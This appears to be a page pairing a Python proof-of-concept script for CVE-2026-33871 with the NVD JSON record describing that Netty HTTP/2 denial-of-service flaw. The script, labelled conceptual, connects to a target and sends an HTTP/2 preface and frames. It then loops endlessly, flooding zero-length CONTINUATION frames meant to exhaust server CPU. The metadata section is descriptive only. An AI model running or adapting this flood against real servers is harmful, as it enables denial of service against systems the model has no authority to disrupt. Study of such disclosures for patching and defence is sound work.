CVE-2026-33871

import socket # Conceptual PoC for CVE-2026-33871 # This script demonstrates the logic of flooding zero-byte CONTINUATION frames. # Target: A vulnerable Netty HTTP/2 server def send_http2_flood(target_ip, target_port): try: # 1. Establish TCP connection s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) print(f"Connected to {target_ip}:{target_port}") # 2. Send HTTP/2 Connection Preface preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n' s.send(preface) # 3. Send HTTP/2 SETTINGS frame (Simplified for demonstration) # Length: 0, Type: 0x4 (SETTINGS), Flags: 0x0, Stream: 0 settings_frame = bytes([0, 0, 0, 0x4, 0x0, 0, 0, 0, 0]) s.send(settings_frame) # 4. Send HEADERS frame to open a stream (Simplified) # Length: 0, Type: 0x1 (HEADERS), Flags: 0x4 (End Headers), Stream: 1 headers_frame = bytes([0, 0, 0, 0x1, 0x4, 0, 0, 0, 1]) s.send(headers_frame) # 5. Flood CONTINUATION frames # The vulnerability is triggered by sending a stream of zero-length CONTINUATION frames. # Type: 0x9 (CONTINUATION), Stream: 1 print("Starting flood of zero-byte CONTINUATION frames...") while True: # Frame Header: Length(3 bytes) + Type(1 byte) + Flags(1 byte) + Stream ID(4 bytes) # Length = 0, Type = 0x9, Flags = 0x0, Stream ID = 1 frame_header = bytes([0, 0, 0, 0x9, 0x0, 0, 0, 0, 1]) s.send(frame_header) except KeyboardInterrupt: print("\nStopping attack.") s.close() except Exception as e: print(f"Error: {e}") # Note: Actual exploitation requires proper HTTP/2 state management, # but this snippet illustrates the resource consumption mechanism. # send_http2_flood("127.0.0.1", 8080)

{"cve": {"id": "CVE-2026-33871", "sourceIdentifier": "[email protected]", "published": "2026-03-27T20:16:34.833", "lastModified": "2026-03-30T20:10:17.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, a remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of `CONTINUATION` frames. The server's lack of a limit on the number of `CONTINUATION` frames, combined with a bypass of existing size-based mitigations using zero-byte frames, allows an user to cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive. Versions 4.1.132.Final and 4.2.10.Final fix the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.1.132", "matchCriteriaId": "8F551B7E-5E29-4062-8FDB-AA1377B3E8F5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0", "versionEndExcluding": "4.2.10", "matchCriteriaId": "419E92FA-6271-4613-AF3D-CF09ADFF2E13"}]}]}], "references": [{"url": "https://github.com/netty/netty/security/advisories/GHSA-w9fj-cfpg-grvv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}